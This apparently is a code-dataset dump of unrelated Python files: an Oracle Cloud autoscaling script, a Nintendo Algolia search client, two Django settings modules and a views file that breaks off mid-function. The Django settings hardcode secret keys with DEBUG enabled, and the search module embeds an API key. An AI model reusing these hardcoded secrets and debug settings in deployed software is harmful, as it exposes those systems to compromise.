MakeOut(" - Error ({}) GoldenGate Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
startaction = oci.golden_gate.models.StartDeploymentDetails()
startaction.type = "DEFAULT"
response = goldengate.start_deployment(deployment_id=resource.identifier, start_deployment_details=startaction)
if response.status == 200:
success.append(" - Initiate GoldenGate startup for {}".format(resource.display_name))
Retry = False
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Data Integration Workshop
###################################################################################
if resource.resource_type == "DISWorkspace":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(
schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Data Integration Workspace shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = dataintegration.stop_workspace(workspace_id=resource.identifier)
Retry = False
success.append(" - Initiate Data Integration Workspace shutdown for {}".format(
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(
" - Error ({}) Data Integration Workspace Shutdown for {} - {}".format(
response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Data Integration Shutdown for {} - {}".format(
response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(
schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Data Integration Workspace startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = dataintegration.start_workspace(workspace_id=resource.identifier)
Retry = False
success.append(" - Initiate Data Integration Workspace startup for {}".format(
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Data Integration Startup startup for {} - {}".format(
response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Wait for any AutonomousDB and Instance Pool Start and rescale tasks completed
###################################################################################
MakeOut("Waiting for all threads to complete...")
for t in threads:
t.join()
MakeOut("Region {} Completed.".format(region))
##########################################################################
# Main
##########################################################################
# Get Command Line Parser
# ---------------------------------------------------------------------------
# Command-line interface
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
# NOTE(review): '-ip' is a store_true flag whose default is already True, so
# instance-principal authentication is effectively always requested and the
# flag cannot be switched off from the command line -- confirm this is intended.
parser.add_argument('-ip', action='store_true', default=True, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-a', default="All", dest='action', help='Action All, Down, Up')
parser.add_argument('-tag', default="Schedule", dest='tag', help='Tag to examine, Default=Schedule')
parser.add_argument('-rg', default="", dest='filter_region', help='Filter Region')
parser.add_argument('-ic', default="", dest='compartment_include', help='Include Compartment OCID')
parser.add_argument('-ec', default="", dest='compartment_exclude', help='Exclude Compartment OCID')
parser.add_argument('-ignrtime', action='store_true', default=False, dest='ignore_region_time', help='Ignore Region Time - Use Host Time')
parser.add_argument('-ignoremysql', action='store_true', default=False, dest='ignoremysql', help='Ignore MYSQL processing')
parser.add_argument('-printocid', action='store_true', default=False, dest='print_ocid', help='Print OCID for resources')
parser.add_argument('-topic', default="", dest='topic', help='Topic to send summary in home region')
cmd = parser.parse_args()
# Only the three documented actions are accepted; anything else shows usage.
if cmd.action != "All" and cmd.action != "Down" and cmd.action != "Up":
    parser.print_help()
    sys.exit(0)
####################################
# Assign variables
####################################
filter_region = cmd.filter_region
Action = cmd.action
PredefinedTag = cmd.tag
# Normalize unset compartment filters to empty strings.
compartment_exclude = cmd.compartment_exclude if cmd.compartment_exclude else ""
compartment_include = cmd.compartment_include if cmd.compartment_include else ""
####################################
# Start print time info
####################################
# Record the script start time (string form, kept for logging/reporting).
start_time = str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
print_header("Running Auto Scale")
# Identity: create the signer, then extract tenancy details and compartments.
config, signer = create_signer(cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
compartments = []
tenancy = None
tenancy_home_region = ""
try:
    MakeOut("Starts at " + str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
    MakeOut("\nConnecting to Identity Service...")
    identity = oci.identity.IdentityClient(config, signer=signer)
    tenancy = identity.get_tenancy(config["tenancy"]).data
    regions = identity.list_region_subscriptions(tenancy.id).data
    # Find the home region; the summary notification is published there later.
    for reg in regions:
        if reg.is_home_region:
            tenancy_home_region = str(reg.region_name)
    MakeOut("")
    MakeOut("Version : " + str(Version))
    MakeOut("Command Line : " + ' '.join(x for x in sys.argv[1:]))
    MakeOut("Tenant Name : " + str(tenancy.name))
    MakeOut("Tenant Id : " + tenancy.id)
    MakeOut("Home Region : " + tenancy_home_region)
    MakeOut("Action : " + Action)
    MakeOut("Tag : " + PredefinedTag)
    if cmd.topic:
        MakeOut("Topic : " + cmd.topic)
    if cmd.filter_region:
        MakeOut("Filter Region : " + cmd.filter_region)
    MakeOut("")
    compartments = identity_read_compartments(identity, tenancy)
except Exception as e:
    # Abort hard: nothing can be scaled without identity/compartment data.
    raise RuntimeError("\nError connecting to Identity Service - " + str(e))
############################################
# Global accumulators, shared with autoscale_region()
############################################
success = []
errors = []
total_resources = 0
ErrorsFound = False
############################################
# Loop on all subscribed regions
############################################
for region_name in [str(es.region_name) for es in regions]:
    # Optional substring filter from the -rg command-line option.
    if cmd.filter_region:
        if cmd.filter_region not in region_name:
            continue
    print_header("Region " + region_name)
    # Point the shared config and signer at the current region.
    config['region'] = region_name
    signer.region = region_name
    ###############################################
    # Service clients - module globals, also used by worker threads
    ###############################################
    compute = oci.core.ComputeClient(config, signer=signer)
    database = oci.database.DatabaseClient(config, signer=signer)
    pool = oci.core.ComputeManagementClient(config, signer=signer)
    search = oci.resource_search.ResourceSearchClient(config, signer=signer)
    oda = oci.oda.OdaClient(config, signer=signer)
    analytics = oci.analytics.AnalyticsClient(config, signer=signer)
    integration = oci.integration.IntegrationInstanceClient(config, signer=signer)
    loadbalancer = oci.load_balancer.LoadBalancerClient(config, signer=signer)
    mysql = oci.mysql.DbSystemClient(config, signer=signer)
    goldengate = oci.golden_gate.GoldenGateClient(config, signer=signer)
    dataintegration = oci.data_integration.DataIntegrationClient(config, signer=signer)
    ###############################################
    # Scale everything in this region
    ###############################################
    autoscale_region(region_name)
############################################
# Publish a summary notification when a topic was specified
############################################
if cmd.topic:
    # Notifications must be published in the tenancy's home region.
    config['region'] = tenancy_home_region
    signer.region = tenancy_home_region
    ns = oci.ons.NotificationDataPlaneClient(config, signer=signer)
    if LogLevel == "ALL" or (LogLevel == "ERRORS" and ErrorsFound):
        MakeOut("\nPublishing notification")
        # NOTE(review): the second placeholder is filled with len(success)
        # although the text reads "scaleable instances" -- confirm wording.
        body_message = "Scaling ({}) just completed. Found {} errors across {} scaleable instances (from a total of {} instances). \nError Details: {}\n\nSuccess Details: {}".format(Action, len(errors), len(success), total_resources, errors, success)
        Retry = True
        while Retry:
            try:
                ns_response = ns.publish_message(cmd.topic, {"title": "Scaling Script ran across tenancy: {}".format(tenancy.name), "body": body_message})
                Retry = False
            except oci.exceptions.ServiceError as ns_response:
                # 429: back off and retry; any other error is logged once and abandoned.
                if ns_response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    MakeOut("Error ({}) publishing notification - {}".format(ns_response.status, ns_response.message))
                    Retry = False
MakeOut("All scaling tasks done, checked {} resources.".format(total_resources))
| true | true |
f72314bffd466950af85d5cfd1e7aca8dcb3c114 | 2,130 | py | Python | nintendeals/noa/api/algolia.py | Pooroomoo/nintendeals | 993f4d159ff405ed82cd2bb023c7b75d921d0acb | [
"MIT"
] | 37 | 2020-04-30T13:48:02.000Z | 2022-03-09T04:55:54.000Z | nintendeals/noa/api/algolia.py | Pooroomoo/nintendeals | 993f4d159ff405ed82cd2bb023c7b75d921d0acb | [
"MIT"
] | 4 | 2020-05-09T03:17:44.000Z | 2021-04-28T00:53:55.000Z | nintendeals/noa/api/algolia.py | Pooroomoo/nintendeals | 993f4d159ff405ed82cd2bb023c7b75d921d0acb | [
"MIT"
] | 5 | 2020-07-22T06:42:27.000Z | 2022-02-07T22:35:57.000Z | from typing import Iterator, Optional
from algoliasearch.search_client import SearchClient
from nintendeals.commons.enumerates import Platforms
# Public Algolia credentials for Nintendo of America's game search index.
APP_ID = "U3B6GR4UA3"
API_KEY = "c4da8be7fd29f0f5bfa42920b0a99dc7"
INDEX_NAME = "ncom_game_en_us"
# Lazily-created Algolia index handle; populated on first _search_index() call.
INDEX = None
# Platform enum -> platform facet name used by the index.
PLATFORMS = {
    Platforms.NINTENDO_3DS: "Nintendo 3DS",
    Platforms.NINTENDO_SWITCH: "Nintendo Switch",
    Platforms.NINTENDO_WIIU: "Wii U",
}
# Platform enum -> numeric nsuid prefix used to enumerate games.
# NOTE(review): the Wii U entry is "Wii U" (a facet name), not a numeric
# prefix like "5001"/"7001"; search_by_platform would therefore build
# queries such as "Wii U0000000" -- confirm whether this is intentional.
PLATFORM_CODES = {
    Platforms.NINTENDO_3DS: "5001",
    Platforms.NINTENDO_SWITCH: "7001",
    Platforms.NINTENDO_WIIU: "Wii U",
}
def _search_index(query, **options):
    """Query the shared Algolia index, building the client on first use.

    Returns the list of hit dicts from the response, or an empty list
    when nothing matched.
    """
    global INDEX
    if not INDEX:
        INDEX = SearchClient.create(APP_ID, API_KEY).init_index(INDEX_NAME)
    result = INDEX.search(query, request_options=options)
    return result.get('hits', [])
def search_by_nsuid(nsuid: str) -> Optional[dict]:
    """Return the first index hit whose nsuid matches, or an empty dict."""
    results = _search_index(nsuid, restrictSearchableAttributes=['nsuid'])
    if results:
        return results[0]
    return {}
def search_by_platform(platform: Platforms) -> Iterator[dict]:
    """Yield every indexed game for *platform* by enumerating candidate nsuids.

    Builds queries of the form ``<platform_code><NNNNNNN>`` (zero-padded
    7-digit counter) and stops once five empty result pages have been seen.
    """
    empty_pages = 0
    # Numeric nsuid prefix for this platform (e.g. "7001" for Switch).
    platform_code = PLATFORM_CODES[platform]
    options = {
        "allowTyposOnNumericTokens": False,  # no typo tolerance on numbers
        "queryType": "prefixAll",  # treat the whole query as a prefix
        "restrictSearchableAttributes": ["nsuid"],
        "facetFilters": [
            f"platform:{PLATFORMS[platform]}"
        ],
        "hitsPerPage": 500,
    }
    current = -1
    while True:
        current += 1
        # Candidate nsuid: platform prefix + zero-padded 7-digit counter.
        query = f"{platform_code}{current:07}"
        games = _search_index(query, **options)
        if not games:
            empty_pages += 1
            # NOTE(review): empty_pages is never reset after a non-empty
            # result, so the scan stops after 5 empty queries in total,
            # not 5 consecutive ones -- confirm this is the intended limit.
            if empty_pages == 5:
                break
        yield from games
def search_by_query(query: str, platform: Platforms = None) -> Iterator[dict]:
    """Yield all hits for a free-text *query*, optionally filtered by platform.

    Pages through results 50 at a time; a page shorter than the page size
    signals the end of the result set.
    """
    page_size = 50
    request_options = {"hitsPerPage": page_size}
    if platform:
        request_options["facetFilters"] = [f"platform:{PLATFORMS[platform]}"]
    page_number = 0
    while True:
        request_options["page"] = page_number
        page_hits = _search_index(query, **request_options)
        yield from page_hits
        if len(page_hits) < page_size:
            return
        page_number += 1
| 21.734694 | 78 | 0.631455 | from typing import Iterator, Optional
from algoliasearch.search_client import SearchClient
from nintendeals.commons.enumerates import Platforms
# Public Algolia credentials for Nintendo of America's game search index.
APP_ID = "U3B6GR4UA3"
API_KEY = "c4da8be7fd29f0f5bfa42920b0a99dc7"
INDEX_NAME = "ncom_game_en_us"
# Lazily-created Algolia index handle; populated on first _search_index() call.
INDEX = None
# Platform enum -> platform facet name used by the index.
PLATFORMS = {
    Platforms.NINTENDO_3DS: "Nintendo 3DS",
    Platforms.NINTENDO_SWITCH: "Nintendo Switch",
    Platforms.NINTENDO_WIIU: "Wii U",
}
# Platform enum -> numeric nsuid prefix used to enumerate games.
# NOTE(review): the Wii U entry is "Wii U" (a facet name), not a numeric
# prefix like "5001"/"7001" -- confirm whether this is intentional.
PLATFORM_CODES = {
    Platforms.NINTENDO_3DS: "5001",
    Platforms.NINTENDO_SWITCH: "7001",
    Platforms.NINTENDO_WIIU: "Wii U",
}
def _search_index(query, **options):
    """Search the shared Algolia index, creating the client lazily.

    Returns the raw list of hit dicts (empty list when nothing matched).
    """
    global INDEX
    if not INDEX:
        client = SearchClient.create(APP_ID, API_KEY)
        INDEX = client.init_index(INDEX_NAME)
    response = INDEX.search(query, request_options=options)
    return response.get('hits', [])
def search_by_nsuid(nsuid: str) -> Optional[dict]:
    """Return the first index hit matching *nsuid*, or an empty dict."""
    hits = _search_index(nsuid, restrictSearchableAttributes=['nsuid'])
    return (hits or [{}])[0]
def search_by_platform(platform: Platforms) -> Iterator[dict]:
    """Yield every indexed game for *platform* by enumerating candidate nsuids.

    Builds queries of the form ``<platform_code><NNNNNNN>`` (zero-padded
    7-digit counter) and stops once five empty result pages have been seen.
    """
    empty_pages = 0
    # Numeric nsuid prefix for this platform (e.g. "7001" for Switch).
    platform_code = PLATFORM_CODES[platform]
    options = {
        "allowTyposOnNumericTokens": False,  # no typo tolerance on numbers
        "queryType": "prefixAll",  # treat the whole query as a prefix
        "restrictSearchableAttributes": ["nsuid"],
        "facetFilters": [
            f"platform:{PLATFORMS[platform]}"
        ],
        "hitsPerPage": 500,
    }
    current = -1
    while True:
        current += 1
        # Candidate nsuid: platform prefix + zero-padded 7-digit counter.
        query = f"{platform_code}{current:07}"
        games = _search_index(query, **options)
        if not games:
            empty_pages += 1
            # NOTE(review): empty_pages never resets on a non-empty result,
            # so the scan stops after 5 empty queries in total -- confirm.
            if empty_pages == 5:
                break
        yield from games
def search_by_query(query: str, platform: Platforms = None) -> Iterator[dict]:
    """Yield all hits for a free-text *query*, optionally filtered by platform.

    Pages through results 50 at a time until a short page signals the end.
    """
    hits_per_page = 50
    options = {
        "hitsPerPage": hits_per_page,
    }
    if platform:
        options["facetFilters"] = [
            f"platform:{PLATFORMS[platform]}"
        ]
    page = -1
    while True:
        page += 1
        options["page"] = page
        games = _search_index(query, **options)
        yield from games
        if len(games) < hits_per_page:
            break
| true | true |
f72314c8dbffd0d7e7aa5f6a9597732183754bb7 | 3,262 | py | Python | yatube/yatube/settings.py | TopcuoH/Yatube | 8f970863cac9a380d37918a80ccc80e7d3e3bb8f | [
"BSD-3-Clause"
] | null | null | null | yatube/yatube/settings.py | TopcuoH/Yatube | 8f970863cac9a380d37918a80ccc80e7d3e3bb8f | [
"BSD-3-Clause"
] | null | null | null | yatube/yatube/settings.py | TopcuoH/Yatube | 8f970863cac9a380d37918a80ccc80e7d3e3bb8f | [
"BSD-3-Clause"
] | null | null | null | """
Django settings for yatube project.
Generated by 'django-admin startproject' using Django 2.2.19.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control; load it from an
# environment variable before deploying.
SECRET_KEY = 'hueqoy8@&b21ty0-(w_!@%*&##8%rn6!=e+0h)nyi$&*rbcopd'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list is only usable while DEBUG is True; add real hostnames for production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'posts.apps.PostsConfig',  # added entry: the project's posts app
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yatube.urls'
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yatube.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
| 25.888889 | 91 | 0.696812 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'hueqoy8@&b21ty0-(w_!@%*&##8%rn6!=e+0h)nyi$&*rbcopd'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'posts.apps.PostsConfig', # Добавленная запись
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yatube.urls'
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yatube.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
| true | true |
f72315a3756903ad9bc3a96587225537f9bf97cd | 603 | py | Python | tests/agents/test_gpc.py | vvanirudh/deluca | 673e66038547db90a7b23335cfe7508728076a4d | [
"Apache-2.0"
] | 25 | 2020-10-27T19:10:36.000Z | 2022-01-04T14:34:29.000Z | tests/agents/test_gpc.py | vvanirudh/deluca | 673e66038547db90a7b23335cfe7508728076a4d | [
"Apache-2.0"
] | 5 | 2020-10-15T00:52:30.000Z | 2021-01-18T18:42:40.000Z | tests/agents/test_gpc.py | vvanirudh/deluca | 673e66038547db90a7b23335cfe7508728076a4d | [
"Apache-2.0"
] | 5 | 2020-12-04T23:12:13.000Z | 2021-06-26T12:38:06.000Z | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""tests.agents.test_gpc"""
| 40.2 | 74 | 0.759536 | true | true | |
f723165ba6a75461f7b45d6169d0437a41afef33 | 3,094 | py | Python | analytics/settings.py | moemosaad/DjYamosaWebsite | 79b5528b0f5cb617231aca50eefcb4a2837086ac | [
"MIT"
] | null | null | null | analytics/settings.py | moemosaad/DjYamosaWebsite | 79b5528b0f5cb617231aca50eefcb4a2837086ac | [
"MIT"
] | null | null | null | analytics/settings.py | moemosaad/DjYamosaWebsite | 79b5528b0f5cb617231aca50eefcb4a2837086ac | [
"MIT"
] | null | null | null | """
Django settings for DjYamosa project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control; load it from an
# environment variable before deploying.
SECRET_KEY = '449k7&ayn!ds)p#=c_+v4p%48ca&og=n8+ocex=p&q$fg$b+=#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjYamosa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjYamosa.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| 25.570248 | 91 | 0.694893 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '449k7&ayn!ds)p#=c_+v4p%48ca&og=n8+ocex=p&q$fg$b+=#'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjYamosa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjYamosa.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| true | true |
f723169d1f5bcd6c14f9e7dcb7f292f96f8606c2 | 3,314 | py | Python | views.py | cartologic/cartoview_esri_app_starter | dca4649fe0200e9b9b709293697a5807a405f6d1 | [
"Apache-2.0"
] | null | null | null | views.py | cartologic/cartoview_esri_app_starter | dca4649fe0200e9b9b709293697a5807a405f6d1 | [
"Apache-2.0"
] | null | null | null | views.py | cartologic/cartoview_esri_app_starter | dca4649fe0200e9b9b709293697a5807a405f6d1 | [
"Apache-2.0"
] | null | null | null | import json
import re
from string import rstrip
from urlparse import urljoin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from cartoview.app_manager.models import *
from forms import BasicAppForm
from geonode import settings
from .models import *
# App label; must match the package name this Cartoview app is registered under.
APP_NAME = 'cartoview_esri_app_starter'
# Template that renders a saved app instance.
VIEW_TPL = "%s/index.html" % APP_NAME
# Template shared by the "new" and "edit" forms.
NEW_EDIT_TPL = "%s/new.html" % APP_NAME
def view(request, resource_id):
    """Render the saved ESRI app instance identified by ``resource_id``."""
    instance = BasicEsriApp.objects.get(pk=resource_id)
    # The stored config may contain JS-style comments; strip them so it
    # parses as strict JSON before injecting per-instance values.
    config_json = json.loads(remove_json_comments(instance.config))
    config_json['webmap'] = str(instance.web_map_id)
    config_json['title'] = instance.title
    config_json['description'] = instance.abstract
    # Portal root URL, without a trailing slash, as the ESRI template expects.
    config_json['sharinghost'] = rstrip(str(urljoin(settings.SITEURL, reverse("arcportal_home"))), '/')
    return render(request, VIEW_TPL, {'config_json': json.dumps(config_json)})
def save(request, app_form):
    """Persist a bound BasicAppForm and redirect to the instance detail page."""
    instance = app_form.save(commit=False)
    # Attach the owning app record and the requesting user before saving.
    instance.app = App.objects.get(name=APP_NAME)
    instance.owner = request.user
    instance.save()
    detail_url = reverse('appinstance_detail',
                         kwargs={'appinstanceid': instance.pk})
    return HttpResponseRedirect(detail_url)
#
def new(request):
    """Create a new app instance.

    GET renders an empty form.  POST validates the submission and, when
    valid, delegates to ``save``; an invalid submission is re-rendered with
    its validation errors instead of letting ``ModelForm.save()`` raise
    ``ValueError`` (the original code saved unconditionally).
    """
    if request.method == 'POST':
        app_form = BasicAppForm(request.POST, prefix='app_form')
        if app_form.is_valid():
            return save(request, app_form)
        # Invalid form: fall through and re-render it with error messages.
    else:
